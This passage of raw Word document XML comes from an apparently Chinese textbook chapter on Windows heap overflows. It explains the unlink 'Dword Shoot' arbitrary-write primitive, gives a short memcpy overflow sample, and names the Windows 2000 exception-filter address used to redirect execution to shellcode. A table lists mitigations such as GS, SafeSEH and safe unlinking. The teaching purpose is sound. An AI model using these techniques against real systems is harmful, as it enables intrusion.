9jLnhtbFBLAQItABQABgAIAAAAIQDu&#10;/1JH2wAAAAUBAAAPAAAAAAAAAAAAAAAAAG0EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAdQUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="4BDBBC52" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="002B51C3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.6</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47D47E64"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*b=c, *c=a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3E018BAF"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*b=c  →  *(a+1)=c  →  *(*p1+1)=*p2</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5C588BBE"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t>*</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>c=a  →  *(*p2)=*p1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4BF5E9B0"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t>*</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>p2=p1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3412F3D5"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t>*</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>(p1+1)=p2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA731F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在堆分配和堆回收时利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要用到</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">mov [ecx],eax </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>mov [eax+4],ecx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>只需要能够控制ECX EAX的值，就可以实现Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B350D79"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.3.3 堆溢出与利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52CA01"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若在2次堆申请语句中间加入一个内存，分析申请buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1C432F"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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2638BCC5" wp14:editId="69AE924D">
                <wp:extent cx="3672840" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:docPr id="1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04620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4BE19D65" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="002B51C3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002B51C3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="29601677"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buf1 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="664AA6D9"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memcpy(buf1,mybuf,32);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="58EFC7F2"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buf2 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2638BCC5" id="_x0000_s1109" type="#_x0000_t202" style="width:28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A6EwIAAP8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6+X17NVnMKSYpN5/l8OUttyUTxfNyhD58UdCxOSo7U1SQvjvc+xHRE8bwl3ubB6HqnjUkL&#10;3Fdbg+woyAG79KUKXm0zlvUlv17MFknZQjyfzNHpQA41uiv5Ko/f6JmI46Ot05YgtBnnlImxJz4R&#10;yQgnDNXAdF3yxTIejrwqqB+JGMLoSHpBNGkB/3DWkxtL7n8fBCrOzGdL1K+n84gopMV8cUWIGF5G&#10;qsuIsJKkSh44G6fbkCyfeLhb6s5OJ24vmZxyJpclnKcXEW18uU67Xt7t5gkAAP//AwBQSwMEFAAG&#10;AAgAAAAhAO7/UkfbAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj7FOw0AQRHsk/uG0SHTkbIuE&#10;yPgcISQalIIkFJQbe/EZ+/aM75yYv2ehgWak1axm3hSb2fXqRGNoPRtIFwko4srXLTcGXg9PN2tQ&#10;ISLX2HsmA18UYFNeXhSY1/7MOzrtY6MkhEOOBmyMQ651qCw5DAs/EIv37keHUc6x0fWIZwl3vc6S&#10;ZKUdtiwNFgd6tFR1+8lJyTZU085/fqTbTr/ZboXLF/tszPXV/HAPKtIc/57hB1/QoRSmo5+4Dqo3&#10;IEPir4q3vFvfgjoayLI0A10W+j99+Q0AAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCNpJA6&#10;EwIAAP8DAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDu&#10;/1JH2wAAAAUBAAAPAAAAAAAAAAAAAAAAAG0EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAdQUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="4BE19D65" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="002B51C3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="29601677"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buf1 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="664AA6D9"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memcpy(buf1,mybuf,32);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="58EFC7F2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="002B51C3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="420"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002B51C3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>buf2 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A2C1B"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分配完buf1之后向其中拷贝内容，拷贝的内容大小超过buf1的大小，即16字节，就会发生溢出，如果覆盖掉两个4字节的指针，而下一次分配buf2之前又没有把buf1释放掉的话，就会把一个4字节的内容写入一个地址当中，而这个内容和地址都是能够控制的，这样就可以控制函数的流程转向Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>漏洞界称之为what→where操作 or Dword Shoot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8ACCF8"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堆溢出利用思路</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>利用 MOV [ECX],EAX MOV [EAX+4]，ECX完成任意地址任意值的控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>利用ESI+0x4c 指向下一个空闲块头部结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE612A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当有不能处理的异常发生时，系统调用UnhandledExceptionFilter函数，其实就是call [0x77EC044c]，即执行0x77EC044</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>指向的异常处理程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>可以把where赋成0x77EC044c, what覆盖成Shellcode的地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77671C6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上述堆溢出利用的思路基于Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统展开，随着系统的更新，Windows对堆管理加入了更多安全机制，例如Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆溢出利用的常用技巧为修改VEH链表指针，而在Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XP系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>RtlCallVectoredExceptionHandlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数对VEH链表指针进行了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>编码处理，在使用指针前需要先解码，避免了堆溢出对指针的修改。对于后续的Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等系统，堆溢出的利用并不是非常容易，常见的堆栈缓冲区溢出攻击都有防御措施，如表2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8DBE1"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hint="eastAsia"/>
        </w:rPr>
        <w:t>表2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见堆栈缓冲区溢出的防御措施</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3402"/>
        <w:gridCol w:w="4894"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="0898C6D4" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D81F61"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典型攻击手段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2538A182"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对应防御技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="66929F84" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68107B3F"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覆盖返回地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B54FD9F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过GS保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="3E19C4BD" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21FE743B"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覆盖</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>EH链</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39BDB6C7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过SafeSEH、SEHOP保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="77282FBD" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D9D5555"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覆盖本地变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17DF9372" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>可能被VC编译器经过重新整理和优化</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="31B3AAA6" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BBC4FC2"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覆盖空闲堆双向链表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624CA71B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过safe</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>unlinking保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="10F37535" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A67519"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覆盖堆块头</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E73546" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>XP下使用8位的HeaderCookie进行保护，VISTA之后使用XOR</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>HeaderData</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
